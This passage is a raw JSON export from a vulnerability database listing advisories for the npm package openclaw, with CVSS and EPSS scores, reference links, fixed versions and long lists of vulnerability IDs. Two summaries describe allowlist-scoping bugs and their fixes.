as"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-x49q-fhhm-r9jf"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tkxh-m458-6ydw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90995?format=json","vulnerability_id":"VCID-tqzy-84fm-z7b6","summ
ary":"OpenClaw: Tlon settings empty-allowlist reconciliation bypassed intended revocation\n## Summary\nTlon settings reconciliation treated explicit empty allowlists as unset, which could silently undo an intended deny-all revocation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now honors explicit empty allowlists as authoritative deny-all configuration.\n- extensions/tlon/src/monitor/settings-helpers.test.ts ships regression coverage for explicit empty settings allowlists.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35649","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10166","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10155","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10185","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35649"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93","reference_id":"","reference_type":"",
"scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35649","reference_id":"CVE-2026-35649","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35649"},{"reference_url":"https://github.com/advisories/GHSA-pw7h-9g6p-c378","reference_id":"GHSA-pw7h-9g6p-c378","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pw7h-9g6p-c378"},{"reference_url":"https://ww
w.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist","reference_id":"openclaw-settings-reconciliation-bypass-via-empty-allowlist","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},
{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},
{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},
{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},
{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35649","GHSA-pw7h-9g6p-c378"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"5.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tqzy-84fm-z7b6"},{"url":"http://public2.vuln
erablecode.io/api/vulnerabilities/50778?format=json","vulnerability_id":"VCID-tu4b-f885-eyds","summary":"OpenClaw: Cross-account sender authorization expansion in `/allowlist ... --store` account scoping\n`/allowlist ... --store` resolved the selected channel `accountId` for reads, but store writes still dropped that `accountId` and wrote into the legacy unscoped pairing allowlist store.\n\nBecause default-account reads still merge legacy unscoped entries, a store entry intended for one account could silently authorize the same sender on the `default` account.\n\nThis is a real cross-account sender-authorization scoping bug. Severity is set to **medium** because exploitation requires an already-authorized user who can run `/allowlist` edits.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/70da80bcb5574a10925469048d2ebb2abf882e73","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/70da80bcb5574a10925469048d2ebb2abf882e73"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-pjvx-rx66-r3fg","refe
rence_id":"GHSA-pjvx-rx66-r3fg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pjvx-rx66-r3fg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pjvx-rx66-r3fg","reference_id":"GHSA-pjvx-rx66-r3fg","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-pjvx-rx66-r3fg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-
a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-
8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-
4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc